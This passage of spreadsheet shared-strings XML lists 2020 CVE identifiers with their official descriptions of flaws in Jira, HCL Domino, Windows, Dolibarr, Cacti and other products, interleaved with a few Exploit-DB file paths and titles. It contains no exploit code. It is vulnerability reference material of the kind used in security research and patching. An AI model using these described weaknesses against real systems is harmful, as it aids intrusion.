    <t>CVE-2020-14148</t>
  </si>
  <si>
    <t>The Server-Server protocol implementation in ngIRCd before 26~rc2 allows an out-of-bounds access, as demonstrated by the IRC_NJOIN() function.</t>
  </si>
  <si>
    <t>CVE-2020-14149</t>
  </si>
  <si>
    <t>In uftpd before 2.12, handle_CWD in ftpcmd.c mishandled the path provided by the user, causing a NULL pointer dereference and denial of service, as demonstrated by a CWD /.. command.</t>
  </si>
  <si>
    <t>CVE-2020-1415</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1249, CVE-2020-1353, CVE-2020-1370, CVE-2020-1399, CVE-2020-1404, CVE-2020-1413, CVE-2020-1414, CVE-2020-1422.</t>
  </si>
  <si>
    <t>CVE-2020-14150</t>
  </si>
  <si>
    <t>GNU Bison before 3.5.4 allows attackers to cause a denial of service (application crash). NOTE: there is a risk only if Bison is used with untrusted input, and an observed bug happens to cause unsafe behavior with a specific compiler/architecture. The bug reports were intended to show that a crash may occur in Bison itself, not that a crash may occur in code that is generated by Bison.</t>
  </si>
  <si>
    <t>CVE-2020-14152</t>
  </si>
  <si>
    <t>In IJG JPEG (aka libjpeg) before 9d, jpeg_mem_available() in jmemnobs.c in djpeg does not honor the max_memory_to_use setting, possibly causing excessive memory consumption.</t>
  </si>
  <si>
    <t>CVE-2020-14153</t>
  </si>
  <si>
    <t>In IJG JPEG (aka libjpeg) from version 8 through 9c, jdhuff.c has an out-of-bounds array read for certain table pointers.</t>
  </si>
  <si>
    <t>CVE-2020-14154</t>
  </si>
  <si>
    <t>Mutt before 1.14.3 proceeds with a connection even if, in response to a GnuTLS certificate prompt, the user rejects an expired intermediate certificate.</t>
  </si>
  <si>
    <t>CVE-2020-14155</t>
  </si>
  <si>
    <t>libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.</t>
  </si>
  <si>
    <t>CVE-2020-14156</t>
  </si>
  <si>
    <t>user_channel/passwd_mgr.cpp in OpenBMC phosphor-host-ipmid before 2020-04-03 does not ensure that /etc/ipmi-pass has strong file permissions.</t>
  </si>
  <si>
    <t>CVE-2020-14157</t>
  </si>
  <si>
    <t>The wireless-communication feature of the ABUS Secvest FUBE50001 device does not encrypt sensitive data such as PIN codes or IDs of used proximity chip keys (RFID tokens). This makes it easier for an attacker to disarm the wireless alarm system.</t>
  </si>
  <si>
    <t>CVE-2020-14158</t>
  </si>
  <si>
    <t>The ABUS Secvest FUMO50110 hybrid module does not have any security mechanism that ensures confidentiality or integrity of RF packets that are exchanged with an alarm panel. This makes it easier to conduct wAppLoxx authentication-bypass attacks.</t>
  </si>
  <si>
    <t>CVE-2020-14159</t>
  </si>
  <si>
    <t>By using an Automate API in ConnectWise Automate before 2020.5.178, a remote authenticated user could execute commands and/or modifications within an individual Automate instance by triggering an SQL injection vulnerability in /LabTech/agent.aspx. This affects versions before 2019.12.337, 2020 before 2020.1.53, 2020.2 before 2020.2.85, 2020.3 before 2020.3.114, 2020.4 before 2020.4.143, and 2020.5 before 2020.5.178.</t>
  </si>
  <si>
    <t>CVE-2020-1416</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Visual Studio and Visual Studio Code when they load software dependencies, aka 'Visual Studio and Visual Studio Code Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49748.txt</t>
  </si>
  <si>
    <t>Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS</t>
  </si>
  <si>
    <t>CVE-2020-14160</t>
  </si>
  <si>
    <t>An SSRF vulnerability in Gotenberg through 6.2.1 exists in the remote URL to PDF conversion, which results in a remote attacker being able to read local files or fetch intranet resources.</t>
  </si>
  <si>
    <t>CVE-2020-14161</t>
  </si>
  <si>
    <t>It is possible to inject HTML and/or JavaScript in the HTML to PDF conversion in Gotenberg through 6.2.1 via the /convert/html endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-14162</t>
  </si>
  <si>
    <t>An issue was discovered in Pi-Hole through 5.0. The local www-data user has sudo privileges to execute the pihole core script as root without a password, which could allow an attacker to obtain root access via shell metacharacters to this script's setdns command.</t>
  </si>
  <si>
    <t>CVE-2020-14163</t>
  </si>
  <si>
    <t>An issue was discovered in ecma/operations/ecma-container-object.c in JerryScript 2.2.0. Operations with key/value pairs did not consider the case where garbage collection is triggered after the key operation but before the value operation, as demonstrated by improper read access to memory in ecma_gc_set_object_visited in ecma/base/ecma-gc.c.</t>
  </si>
  <si>
    <t>CVE-2020-14164</t>
  </si>
  <si>
    <t>The WYSIWYG editor resource in Jira Server and Data Center before version 8.8.2 allows remote attackers to inject arbitrary HTML or JavaScript names via an Cross Site Scripting (XSS) vulnerability by pasting javascript code into the editor field.</t>
  </si>
  <si>
    <t>CVE-2020-14165</t>
  </si>
  <si>
    <t>The UniversalAvatarResource.getAvatars resource in Jira Server and Data Center before version 8.9.0 allows remote attackers to obtain information about custom project avatars names via an Improper authorization vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-14166</t>
  </si>
  <si>
    <t>The /servicedesk/customer/portals resource in Jira Service Desk Server and Data Center before version 4.10.0 allows remote attackers with project administrator privileges to inject arbitrary HTML or JavaScript names via an Cross Site Scripting (XSS) vulnerability by uploading a html file.</t>
  </si>
  <si>
    <t>CVE-2020-14167</t>
  </si>
  <si>
    <t>The MessageBundleResource resource in Jira Server and Data Center before version 7.13.4, from 8.5.0 before 8.5.5, from 8.8.0 before 8.8.2, and from 8.9.0 before 8.9.1 allows remote attackers to impact the application's availability via an Denial of Service (DoS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-14168</t>
  </si>
  <si>
    <t>The email client in Jira Server and Data Center before version 7.13.16, from 8.5.0 before 8.5.7, from 8.8.0 before 8.8.2, and from 8.9.0 before 8.9.1 allows remote attackers to access outgoing emails between a Jira instance and the SMTP server via man-in-the-middle (MITM) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-14169</t>
  </si>
  <si>
    <t>The quick search component in Atlassian Jira Server and Data Center before 8.9.1 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-1417</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1486, CVE-2020-1566.</t>
  </si>
  <si>
    <t>CVE-2020-14170</t>
  </si>
  <si>
    <t>Webhooks in Atlassian Bitbucket Server from version 5.4.0 before version 7.3.1 allow remote attackers to access the content of internal network resources via a Server-Side Request Forgery (SSRF) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-14171</t>
  </si>
  <si>
    <t>Atlassian Bitbucket Server from version 4.9.0 before version 7.2.4 allows remote attackers to intercept unencrypted repository import requests via a Man-in-the-Middle (MITM) attack.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-14172</t>
  </si>
  <si>
    <t>This issue exists to document that a security improvement in the way that Jira Server and Data Center use velocity templates has been implemented. The way in which velocity templates were used in Atlassian Jira Server and Data Center in affected versions allowed remote attackers to achieve remote code execution via insecure deserialization, if they were able to exploit a server side template injection vulnerability. The affected versions are before version 7.13.0, from version 8.0.0 before 8.5.0, and from version 8.6.0 before version 8.8.1.</t>
  </si>
  <si>
    <t>CVE-2020-14173</t>
  </si>
  <si>
    <t>The file upload feature in Atlassian Jira Server and Data Center in affected versions allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability. The affected versions are before version 8.5.4, from version 8.6.0 before 8.6.2, and from version 8.7.0 before 8.7.1.</t>
  </si>
  <si>
    <t>CVE-2020-14174</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow remote attackers to view titles of a private project via an Insecure Direct Object References (IDOR) vulnerability in the Administration Permission Helper. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, from version 8.6.0 before 8.9.2, and from version 8.10.0 before 8.10.1.</t>
  </si>
  <si>
    <t>CVE-2020-14175</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Confluence Server and Data Center allow remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in user macro parameters. The affected versions are before version 7.4.2, and from version 7.5.0 before 7.5.2.</t>
  </si>
  <si>
    <t>CVE-2020-14177</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow remote attackers to impact the application's availability via a Regex-based Denial of Service (DoS) vulnerability in JQL version searching. The affected versions are before version 7.13.16; from version 7.14.0 before 8.5.7; from version 8.6.0 before 8.10.2; and from version 8.11.0 before 8.11.1.</t>
  </si>
  <si>
    <t>CVE-2020-14178</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow remote attackers to enumerate project keys via an Information Disclosure vulnerability in the /browse.PROJECTKEY endpoint. The affected versions are before version 7.13.7, from version 8.0.0 before 8.5.8, and from version 8.6.0 before 8.12.0.</t>
  </si>
  <si>
    <t>CVE-2020-14179</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1.</t>
  </si>
  <si>
    <t>CVE-2020-1418</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Diagnostics Execution Service fails to properly sanitize input, leading to an unsecure library-loading behavior, aka 'Windows Diagnostics Hub Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1393.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49633.py</t>
  </si>
  <si>
    <t>Atlassian JIRA 8.11.1 - User Enumeration</t>
  </si>
  <si>
    <t>2021-03-10</t>
  </si>
  <si>
    <t>CVE-2020-14180</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Service Desk Server and Data Center allow remote attackers authenticated as a non-administrator user to view Project Request-Types and Descriptions, via an Information Disclosure vulnerability in the editform request-type-fields resource. The affected versions are before version 4.12.0.</t>
  </si>
  <si>
    <t>CVE-2020-14181</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.</t>
  </si>
  <si>
    <t>CVE-2020-14183</t>
  </si>
  <si>
    <t>Affected versions of Jira Server &amp; Data Center allow a remote attacker with limited (non-admin) privileges to view a Jira instance's Support Entitlement Number (SEN) via an Information Disclosure vulnerability in the HTTP Response headers. The affected versions are before version 7.13.18, from version 8.0.0 before 8.5.9, and from version 8.6.0 before 8.12.1.</t>
  </si>
  <si>
    <t>CVE-2020-14184</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server allow remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in Jira issue filter export files. The affected versions are before 8.5.9, from version 8.6.0 before 8.12.3, and from version 8.13.0 before 8.13.1.</t>
  </si>
  <si>
    <t>CVE-2020-14185</t>
  </si>
  <si>
    <t>Affected versions of Jira Server allow remote unauthenticated attackers to enumerate issue keys via a missing permissions check in the ActionsAndOperations resource. The affected versions are before 7.13.18, from version 8.0.0 before 8.5.9, and from version 8.6.0 before version 8.12.2.</t>
  </si>
  <si>
    <t>CVE-2020-14188</t>
  </si>
  <si>
    <t>The preprocessArgs function in the Atlassian gajira-create GitHub Action before version 2.0.1 allows remote attackers to execute arbitrary code in the context of a GitHub runner by creating a specially crafted GitHub issue.</t>
  </si>
  <si>
    <t>CVE-2020-14189</t>
  </si>
  <si>
    <t>The execute function in in the Atlassian gajira-comment GitHub Action before version 2.0.2 allows remote attackers to execute arbitrary code in the context of a GitHub runner by creating a specially crafted GitHub issue comment.</t>
  </si>
  <si>
    <t>CVE-2020-1419</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1367, CVE-2020-1389, CVE-2020-1426.</t>
  </si>
  <si>
    <t>CVE-2020-14190</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Fisheye/Crucible allow remote attackers to achieve Regex Denial of Service via user-supplied regex in EyeQL. The affected versions are before version 4.8.4.</t>
  </si>
  <si>
    <t>CVE-2020-14191</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Fisheye/Crucible allow remote attackers to impact the application's availability via a Denial of Service (DoS) vulnerability in the MessageBundleResource within Atlassian Gadgets. The affected versions are before version 4.8.4.</t>
  </si>
  <si>
    <t>CVE-2020-14192</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Fisheye and Crucible allow remote attackers to view a product's SEN via an Information Disclosure vulnerability in the x-asen response header from Atlassian Analytics. The affected versions are before version 4.8.4.</t>
  </si>
  <si>
    <t>CVE-2020-14193</t>
  </si>
  <si>
    <t>Affected versions of Automation for Jira - Server allowed remote attackers to read and render files as mustache templates in files inside the WEB-INF/classes &amp; &lt;jira-installation&gt;/jira/bin directories via a template injection vulnerability in Jira smart values using mustache partials. The affected versions are those before version 7.1.15.</t>
  </si>
  <si>
    <t>CVE-2020-14194</t>
  </si>
  <si>
    <t>Zulip Server before 2.1.5 allows reverse tabnapping via a topic header link.</t>
  </si>
  <si>
    <t>CVE-2020-14195</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).</t>
  </si>
  <si>
    <t>CVE-2020-14196</t>
  </si>
  <si>
    <t>In PowerDNS Recursor versions up to and including 4.3.1, 4.2.2 and 4.1.16, the ACL restricting access to the internal web server is not properly enforced.</t>
  </si>
  <si>
    <t>CVE-2020-14198</t>
  </si>
  <si>
    <t>Bitcoin Core 0.20.0 allows remote denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-14199</t>
  </si>
  <si>
    <t>BIP-143 in the Bitcoin protocol specification mishandles the signing of a Segwit transaction, which allows attackers to trick a user into making two signatures in certain cases, potentially leading to a huge transaction fee. NOTE: this affects all hardware wallets. It was fixed in 1.9.1 for the Trezor One and 2.3.1 for the Trezor Model T.</t>
  </si>
  <si>
    <t>CVE-2020-1420</t>
  </si>
  <si>
    <t>exploits/php/webapps/49711.py</t>
  </si>
  <si>
    <t>Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)</t>
  </si>
  <si>
    <t>2021-03-25</t>
  </si>
  <si>
    <t>CVE-2020-14201</t>
  </si>
  <si>
    <t>Dolibarr CRM before 11.0.5 allows privilege escalation. This could allow remote authenticated attackers to upload arbitrary files via societe/document.php in which "disabled" is changed to "enabled" in the HTML source code.</t>
  </si>
  <si>
    <t>CVE-2020-14202</t>
  </si>
  <si>
    <t>WebFOCUS Business Intelligence 8.0 (SP6) was prone to XSS via arbitrary URL parameters.</t>
  </si>
  <si>
    <t>CVE-2020-14203</t>
  </si>
  <si>
    <t>WebFOCUS Business Intelligence 8.0 (SP6) allows a Cross-Site Request Forgery (CSRF) attack against administrative users within the /ibi_apps/WFServlet(.ibfs) endpoint. The impact may be creation of an administrative user. It can also be exploited in conjunction with CVE-2016-9044.</t>
  </si>
  <si>
    <t>CVE-2020-14204</t>
  </si>
  <si>
    <t>In WebFOCUS Business Intelligence 8.0 (SP6), the administration portal allows remote attackers to read arbitrary local files or forge server-side HTTP requests via a crafted HTTP request to /ibi_apps/WFServlet.cfg because XML external entity injection is possible. This is related to making changes to the application repository configuration.</t>
  </si>
  <si>
    <t>CVE-2020-14205</t>
  </si>
  <si>
    <t>The DiveBook plugin 1.1.4 for WordPress is prone to improper access control in the Log Dive form because it fails to perform authorization checks. An attacker may leverage this issue to manipulate the integrity of dive logs.</t>
  </si>
  <si>
    <t>CVE-2020-14206</t>
  </si>
  <si>
    <t>The DiveBook plugin 1.1.4 for WordPress is prone to unauthenticated XSS within the filter function (via an arbitrary parameter).</t>
  </si>
  <si>
    <t>CVE-2020-14207</t>
  </si>
  <si>
    <t>The DiveBook plugin 1.1.4 for WordPress was prone to a SQL injection within divelog.php, allowing unauthenticated users to retrieve data from the database via the divelog.php filter_diver parameter.</t>
  </si>
  <si>
    <t>CVE-2020-14208</t>
  </si>
  <si>
    <t>SuiteCRM 7.11.13 is affected by stored Cross-Site Scripting (XSS) in the Documents preview functionality. This vulnerability could allow remote authenticated attackers to inject arbitrary web script or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-14209</t>
  </si>
  <si>
    <t>Dolibarr before 11.0.5 allows low-privilege users to upload files of dangerous types, leading to arbitrary code execution. This occurs because .pht and .phar files can be uploaded. Also, a .htaccess file can be uploaded to reconfigure access control (e.g., to let .noexe files be executed as PHP code to defeat the .noexe protection mechanism).</t>
  </si>
  <si>
    <t>CVE-2020-1421</t>
  </si>
  <si>
    <t>CVE-2020-14210</t>
  </si>
  <si>
    <t>Reflected Cross-Site Scripting (XSS) vulnerability in MONITORAPP WAF in which script can be executed when responding to Request URL information. It provides a function to response to Request URL information when blocking.</t>
  </si>
  <si>
    <t>CVE-2020-14212</t>
  </si>
  <si>
    <t>FFmpeg through 4.3 has a heap-based buffer overflow in avio_get_str in libavformat/aviobuf.c because dnn_backend_native.c calls ff_dnn_load_model_native and a certain index check is omitted.</t>
  </si>
  <si>
    <t>CVE-2020-14213</t>
  </si>
  <si>
    <t>In Zammad before 3.3.1, a Customer has ticket access that should only be available to an Agent (e.g., read internal data, split, or merge).</t>
  </si>
  <si>
    <t>CVE-2020-14214</t>
  </si>
  <si>
    <t>Zammad before 3.3.1, when Domain Based Assignment is enabled, relies on a claimed e-mail address for authorization decisions. An attacker can register a new account that will have access to all tickets of an arbitrary Organization.</t>
  </si>
  <si>
    <t>CVE-2020-14215</t>
  </si>
  <si>
    <t>Zulip Server before 2.1.5 has Incorrect Access Control because 0198_preregistrationuser_invited_as adds the administrator role to invitations.</t>
  </si>
  <si>
    <t>CVE-2020-1422</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1249, CVE-2020-1353, CVE-2020-1370, CVE-2020-1399, CVE-2020-1404, CVE-2020-1413, CVE-2020-1414, CVE-2020-1415.</t>
  </si>
  <si>
    <t>CVE-2020-14221</t>
  </si>
  <si>
    <t>HCL Digital Experience 8.5, 9.0, and 9.5 exposes information about the server to unauthorized users.</t>
  </si>
  <si>
    <t>CVE-2020-14222</t>
  </si>
  <si>
    <t>HCL Digital Experience 8.5, 9.0, 9.5 is susceptible to cross site scripting (XSS). One subcomponent is vulnerable to reflected XSS. In reflected XSS, an attacker must induce a victim to click on a crafted URL from some delivery mechanism (email, other web site).</t>
  </si>
  <si>
    <t>CVE-2020-14223</t>
  </si>
  <si>
    <t>HCL Digital Experience 8.5, 9.0, 9.5 is susceptible to cross-site scripting (XSS). The vulnerability could be employed in a reflected or non-persistent XSS attack.</t>
  </si>
  <si>
    <t>CVE-2020-14224</t>
  </si>
  <si>
    <t>A vulnerability in the MIME message handling of the HCL Notes v9 client could potentially be exploited by an unauthenticated attacker resulting in a stack buffer overflow. This could allow a remote attacker to crash the Notes application or inject code into the system which would execute with the privileges of the currently logged-in user.</t>
  </si>
  <si>
    <t>CVE-2020-14225</t>
  </si>
  <si>
    <t>HCL iNotes is susceptible to a Tabnabbing vulnerability caused by improper sanitization of message content. A remote unauthenticated attacker could use this vulnerability to trick the end user into entering sensitive information such as credentials, e.g. as part of a phishing attack.</t>
  </si>
  <si>
    <t>CVE-2020-1423</t>
  </si>
  <si>
    <t>CVE-2020-14230</t>
  </si>
  <si>
    <t>HCL Domino is susceptible to a Denial of Service vulnerability caused by improper validation of user-supplied input. A remote unauthenticated attacker could exploit this vulnerability using a specially-crafted email message to hang the server. Versions previous to releases 9.0.1 FP10 IF6, 10.0.1 FP5 and 11.0.1 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-14231</t>
  </si>
  <si>
    <t>A vulnerability in the input parameter handling of HCL Client Application Access v9 could potentially be exploited by an authenticated attacker resulting in a stack buffer overflow. This could allow the attacker to crash the program or inject code into the system which would execute with the privileges of the currently logged in user.</t>
  </si>
  <si>
    <t>CVE-2020-14232</t>
  </si>
  <si>
    <t>A vulnerability in the input parameter handling of HCL Notes v9 could potentially be exploited by an authenticated attacker resulting in a stack buffer overflow. This could allow the attacker to crash the program or inject code into the system which would execute with the privileges of the currently logged in user.</t>
  </si>
  <si>
    <t>CVE-2020-14234</t>
  </si>
  <si>
    <t>HCL Domino is susceptible to a Denial of Service vulnerability due to improper validation of user-supplied input, potentially giving an attacker the ability to crash the server. Versions previous to release 9.0.1 FP10 IF6 and release 10.0.1 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-1424</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory, aka 'Windows Update Stack Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14240</t>
  </si>
  <si>
    <t>HCL Notes versions previous to releases 9.0.1 FP10 IF8, 10.0.1 FP6 and 11.0.1 FP1 is susceptible to a Stored Cross-site Scripting (XSS) vulnerability. An attacker could use this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site and/or steal the victim's cookie-based authentication credentials.</t>
  </si>
  <si>
    <t>CVE-2020-14244</t>
  </si>
  <si>
    <t>A vulnerability in the MIME message handling of the Domino server (versions 9 and 10) could potentially be exploited by an unauthenticated attacker resulting in a stack buffer overflow. This could allow a remote attacker to crash the server or inject code into the system which would execute with the privileges of the server.</t>
  </si>
  <si>
    <t>CVE-2020-14245</t>
  </si>
  <si>
    <t>HCL OneTest UI V9.5, V10.0, and V10.1 does not perform authentication for functionality that either requires a provable user identity or consumes a significant amount of resources.</t>
  </si>
  <si>
    <t>CVE-2020-14246</t>
  </si>
  <si>
    <t>HCL OneTest Performance V9.5, V10.0, V10.1 uses basic authentication which is relatively weak. An attacker could potentially decode the encoded credentials.</t>
  </si>
  <si>
    <t>CVE-2020-14247</t>
  </si>
  <si>
    <t>HCL OneTest Performance V9.5, V10.0, V10.1 contains an inadequate session timeout, which could allow an attacker time to guess and use a valid session ID.</t>
  </si>
  <si>
    <t>CVE-2020-14248</t>
  </si>
  <si>
    <t>BigFix Inventory up to v10.0.2 does not set the secure flag for the session cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.</t>
  </si>
  <si>
    <t>CVE-2020-1425</t>
  </si>
  <si>
    <t>A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1457.</t>
  </si>
  <si>
    <t>CVE-2020-14254</t>
  </si>
  <si>
    <t>TLS-RSA cipher suites are not disabled in HCL BigFix Inventory up to v10.0.2. If TLS 2.0 and secure ciphers are not enabled then an attacker can passively record traffic and later decrypt it.</t>
  </si>
  <si>
    <t>CVE-2020-14255</t>
  </si>
  <si>
    <t>HCL Digital Experience 9.5 containers include vulnerabilities that could expose sensitive data to unauthorized parties via crafted requests. These affect containers only. These do not affect traditional on-premise installations.</t>
  </si>
  <si>
    <t>CVE-2020-14258</t>
  </si>
  <si>
    <t>HCL Notes is susceptible to a Denial of Service vulnerability caused by improper validation of user-supplied input. A remote unauthenticated attacker could exploit this vulnerability using a specially-crafted email message to hang the client. Versions 9, 10 and 11 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-1426</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1367, CVE-2020-1389, CVE-2020-1419.</t>
  </si>
  <si>
    <t>CVE-2020-14260</t>
  </si>
  <si>
    <t>HCL Domino is susceptible to a Buffer Overflow vulnerability in DXL due to improper validation of user input. A successful exploit could enable an attacker to crash Domino or execute attacker-controlled code on the server system.</t>
  </si>
  <si>
    <t>CVE-2020-14263</t>
  </si>
  <si>
    <t>"HCL Traveler Companion is vulnerable to an iOS weak cryptographic process vulnerability via the included MobileIron AppConnect SDK"</t>
  </si>
  <si>
    <t>CVE-2020-14264</t>
  </si>
  <si>
    <t>CVE-2020-14268</t>
  </si>
  <si>
    <t>A vulnerability in the MIME message handling of the Notes client (versions 9 and 10) could potentially be exploited by an unauthenticated attacker resulting in a stack buffer overflow. This could allow a remote attacker to crash the client or inject code into the system which would execute with the privileges of the client.</t>
  </si>
  <si>
    <t>CVE-2020-1427</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory, aka 'Windows Network Connections Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1373, CVE-2020-1390, CVE-2020-1428, CVE-2020-1438.</t>
  </si>
  <si>
    <t>CVE-2020-14270</t>
  </si>
  <si>
    <t>HCL Domino v9, v10, v11 is susceptible to an Information Disclosure vulnerability in XPages due to improper error handling of user input. An unauthenticated attacker could exploit this vulnerability to obtain information about the XPages software running on the Domino server.</t>
  </si>
  <si>
    <t>CVE-2020-14271</t>
  </si>
  <si>
    <t>HCL iNotes v9, v10 and v11 is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability due to improper handling of message content. An unauthenticated remote attacker could exploit this vulnerability using specially-crafted markup to execute script in a victim's web browser within the security context of the hosting Web site and/or steal the victim's cookie-based authentication credentials.</t>
  </si>
  <si>
    <t>CVE-2020-14273</t>
  </si>
  <si>
    <t>HCL Domino is susceptible to a Denial of Service (DoS) vulnerability due to insufficient validation of input to its public API. An unauthenticated attacker could could exploit this vulnerability to crash the Domino server.</t>
  </si>
  <si>
    <t>CVE-2020-14274</t>
  </si>
  <si>
    <t>Information disclosure vulnerability in HCL Commerce 9.0.1.9 through 9.0.1.14 and 9.1 through 9.1.4 could allow a remote attacker to obtain user personal data via unknown vectors.</t>
  </si>
  <si>
    <t>CVE-2020-14275</t>
  </si>
  <si>
    <t>Security vulnerability in HCL Commerce 9.0.0.5 through 9.0.0.13, 9.0.1.0 through 9.0.1.14 and 9.1 through 9.1.4 could allow denial of service, disclosure of user personal data, and performing of unauthorized administrative operations.</t>
  </si>
  <si>
    <t>CVE-2020-1428</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory, aka 'Windows Network Connections Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1373, CVE-2020-1390, CVE-2020-1427, CVE-2020-1438.</t>
  </si>
  <si>
    <t>CVE-2020-1429</t>
  </si>
  <si>
    <t>exploits/php/webapps/49810.py</t>
  </si>
  <si>
    <t>Cacti 1.2.12 - 'filter' SQL Injection</t>
  </si>
  <si>
    <t>2021-04-29</t>
  </si>
  <si>
    <t>CVE-2020-14292</t>
  </si>
  <si>
    <t>In the COVIDSafe application through 1.0.21 for Android, unsafe use of the Bluetooth transport option in the GATT connection allows attackers to trick the application into establishing a connection over Bluetooth BR/EDR transport, which reveals the public Bluetooth address of the victim's phone without authorisation, bypassing the Bluetooth address randomisation protection in the user's phone.</t>
  </si>
  <si>
    <t>CVE-2020-14293</t>
  </si>
  <si>
    <t>conf_datetime in Secudos DOMOS 5.8 allows remote attackers to execute arbitrary commands as root via shell metacharacters in the zone field (obtained from the web interface).</t>
  </si>
  <si>
    <t>CVE-2020-14294</t>
  </si>
  <si>
    <t>An issue was discovered in Secudos Qiata FTA 1.70.19. The comment feature allows persistent XSS that is executed when reading transfer comments or the global notice board.</t>
  </si>
  <si>
    <t>CVE-2020-14295</t>
  </si>
  <si>
    <t>A SQL injection issue in color.php in Cacti 1.2.12 allows an admin to inject SQL via the filter parameter. This can lead to remote command execution because the product accepts stacked queries.</t>
  </si>
  <si>
    <t>CVE-2020-14296</t>
  </si>
  <si>
    <t>Red Hat CloudForms 4.7 and 5 was vulnerable to Server-Side Request Forgery (SSRF) flaw. With the access to add Ansible Tower provider, an attacker could scan and attack systems from the internal network which are not normally accessible.</t>
  </si>
  <si>
    <t>CVE-2020-14297</t>
  </si>
  <si>
    <t>A flaw was discovered in Wildfly's EJB Client as shipped with Red Hat JBoss EAP 7, where some specific EJB transaction objects may get accumulated over the time and can cause services to slow down and eventaully unavailable. An attacker can take advantage and cause denial of service attack and make services unavailable.</t>
  </si>
  <si>
    <t>CVE-2020-14298</t>
  </si>
  <si>
    <t>The version of docker as released for Red Hat Enterprise Linux 7 Extras via RHBA-2020:0053 advisory included an incorrect version of runc missing the fix for CVE-2019-5736, which was previously fixed via RHSA-2019:0304. This issue could allow a malicious or compromised container to compromise the container host and other containers running on the same host. This issue only affects docker version 1.13.1-108.git4ef4b30.el7, shipped in Red Hat Enterprise Linux 7 Extras. Both earlier and later versions are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-14299</t>
  </si>
  <si>
    <t>A flaw was found in JBoss EAP, where the authentication configuration is set-up using a legacy SecurityRealm, to delegate to a legacy PicketBox SecurityDomain, and then reloaded to admin-only mode. This flaw allows an attacker to perform a complete authentication bypass by using an arbitrary user and password. The highest threat to vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-1430</t>
  </si>
  <si>
